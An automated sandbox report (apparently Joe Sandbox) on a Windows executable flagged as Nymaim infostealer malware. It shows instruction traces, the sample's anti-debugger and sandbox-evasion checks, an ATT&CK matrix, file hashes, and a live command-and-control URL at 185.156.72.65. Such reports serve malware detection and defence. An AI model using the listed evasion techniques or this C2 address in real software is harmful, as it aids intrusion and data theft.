                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0940 second address: 49E095A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 87h 0x00000005 push esi 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99FD381EEDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E095A second address: 49E0960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01825 second address: 4A01829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01829 second address: 4A0182D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0182D second address: 4A01833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01833 second address: 4A0184F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0184F second address: 4A01873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, ah 0x0000000e jmp 00007F99FD381EF5h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01873 second address: 4A0187A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0187A second address: 4A01907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F99FD381EF5h 0x00000011 or esi, 7FF3F2D6h 0x00000017 jmp 00007F99FD381EF1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F99FD381EF0h 0x00000023 add al, FFFFFFF8h 0x00000026 jmp 00007F99FD381EEBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov di, si 0x00000030 popad 0x00000031 mov ecx, dword ptr [ebp+08h] 0x00000034 jmp 00007F99FD381EF2h 0x00000039 or eax, FFFFFFFFh 0x0000003c jmp 00007F99FD381EF0h 0x00000041 lock xadd dword ptr [ecx], eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01907 second address: 4990649 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F99FCCDC7E4h 0x0000000c popad 0x0000000d dec eax 0x0000000e jmp 00007F99FCCDC7E0h 0x00000013 pop ebp 0x00000014 pushad 0x00000015 jmp 00007F99FCCDC7DEh 0x0000001a pushfd 0x0000001b jmp 00007F99FCCDC7E2h 0x00000020 add eax, 23D13278h 0x00000026 jmp 00007F99FCCDC7DBh 0x0000002b popfd 0x0000002c popad 0x0000002d retn 0004h 0x00000030 nop 0x00000031 test eax, eax 0x00000033 jne 00007F99FCCDC7E3h 0x00000035 mov eax, dword ptr [esi+68h] 0x00000038 cmp eax, 00459850h 0x0000003d je 00007F99FCCDC7D9h 0x0000003f mov dword ptr [esi+68h], ebx 0x00000042 push ebx 0x00000043 mov edi, dword ptr [00401014h] 0x00000049 call edi 0x0000004b mov edi, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F99FCCDC7E7h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D2 second address: 49E07D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D6 second address: 49E07DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07DC second address: 49E07F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF3h 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473B17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473BF5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6274F6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473B21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 69F439 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB165 rdtsc 0_2_006FB165
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 657Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1279Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1038Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 765Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.6 %
                Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep count: 68 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep time: -136068s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 145 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 168 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 160 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7336Thread sleep count: 657 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7336Thread sleep time: -1314657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep count: 1279 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep time: -2559279s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 106 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 72 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 93 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 80 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7272Thread sleep count: 79 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep count: 1038 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep time: -2077038s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep count: 765 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep time: -1530765s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495798E FindFirstFileExW,0_2_0495798E
                Source: file.exe, file.exe, 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4452747313.0000000000B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4452747313.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found potential dummy code loops (likely to delay analysis)
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB165 rdtsc 0_2_006FB165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04797D41 push dword ptr fs:[00000030h]0_2_04797D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04940D90 mov eax, dword ptr fs:[00000030h]0_2_04940D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494092B mov eax, dword ptr fs:[00000030h]0_2_0494092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04949C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04949C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494A987 SetUnhandledExceptionFilter,0_2_0494A987
                Source: file.exe, file.exe, 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Process Injection                		341
                Virtualization/Sandbox Evasion                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory771
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager341
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync213
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe34%ReversingLabsWin32.Infostealer.Tinba
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubG100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubH100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubD100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubCon100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubf100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubE100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubConfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubHfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubGfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubffile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubEfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubDfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubRfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubbfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubrfile.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.156.72.65
                    		unknownRussian Federation
                    		44636ITDELUXE-ASRUtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1565722
                    Start date and time:2024-11-30 16:41:07 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240s for sample files taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:42:23API Interceptor10170234x Sleep call for process: file.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.156.72.65file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, NymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65/soft/download

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ITDELUXE-ASRUfile.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, NymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.94671984196727
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:2'008'064 bytes
                    MD5:24fd69187bd9cb0bfbae4c051db9e658
                    SHA1:484e593d6f0410027ec108a670a0f2e4b112244a
                    SHA256:31dc48b6c89b00fffa7e3377584085558cc79bec167ba7143cc75915696369e7
                    SHA512:e4e68cdc83cd9a8601f0ba5ec4ddbd232bfb108b32486a339f49664582b5dc7e2db14dbbe5f57c8eec088081b7bd209f527f6002212955eda7dcf216bbca2a82
                    SSDEEP:49152:lilRiZSDkSe/03fv9HsyW1n6RIs1QNvIZnGZ:VZR/8qy8UlG1IVG
                    TLSH:CD953310BCD66576EC0364B3C509060B571A714DB6FC28EA9B90E89A3BF787D3B910F6
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

                    File Icon

                    Icon Hash:cfa99b8a8651798d

                    Static PE Info

                    General

                    Entrypoint:0x8b1000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F99FCB2ED7Ah
                    jc 00007F99FCB2ED94h
                    add byte ptr [eax], al
                    jmp 00007F99FCB30D75h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx+03h], ch
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [eax+00000000h], eax
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [eax+00000000h], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [esi], cl
                    add al, 00h
                    add byte ptr [eax+eax], cl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
